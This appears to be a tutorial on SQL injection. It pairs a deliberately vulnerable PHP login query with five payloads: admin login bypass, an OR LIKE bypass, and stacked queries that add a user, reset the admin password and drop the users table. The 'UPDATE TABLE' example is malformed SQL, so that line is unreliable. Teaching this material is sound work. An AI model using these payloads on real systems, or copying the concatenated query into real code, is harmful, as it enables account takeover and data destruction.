Example 1

Example 1

query checks if the provided username and password match an entry in the database

<?php
// connect to database
$db = new PDO(CONNECTION_STRING, DB_USER, DB_PASS);
$query = "SELECT * FROM users WHERE user = '" . $_POST["user"] .
"' AND password = '" . $_POST["password"] . "'";
//if query is not empty - establish session with found query
...
?>

Our Database:

user				password				age
--------------------------------
admin				1f4sdge!				37
mauro				mkfln34.				30
matteo			a4njDa!					42

Legitimate Use Case:

user: admin
password: 1f4sdge!

SELECT * FROM users WHERE user='admin' AND password='1f4sdge!'

Exploit 1: Authenticating as the admin.

--followed by a space starts an inline comment

user: admin' -- -
password: whatever

SELECT * FROM users WHERE user='admin' -- -' AND password='whatever'

Exploit 2: Authenticating as the first user in the users list called admin

Less control than the previous payload.

%matches an arbitrary sequence of characters - always satisfied

user: admin
password: ' OR password LIKE '%

SELECT * FROM users WHERE user='admin' AND password='' OR password LIKE '%';

Exploit 3: Adding a new user, damages data integrity

Only if stacked queries are enabled in the DB configuration.

user: '; INSERT INTO users (user,password, age) VALUES ('attacker', 'mypwd', 1) -- -
password: whatever

SELECT * FROM users WHERE user='';
INSERT INTO users (user, password, age) VALUES ('attacker', 'mypwd', 1)
-- -' AND password='whatever'

Exploit 4: Editing the admins password

user: '; UPDATE TABLE users SET password='newpwd' WHERE user='admin'-- -
passwort: 

SELECT * FROM users WHERE user='';
UPDATE TABLE users SET password='newpwd' WHERE user='admin'
-- -' AND password=''

Exploit 5: Dropping the users table from the database

user: '; DROP TABLE users -- -
password: 

SELECT * FROM users WHERE user='';
DROP TABLE users -- -' AND password='';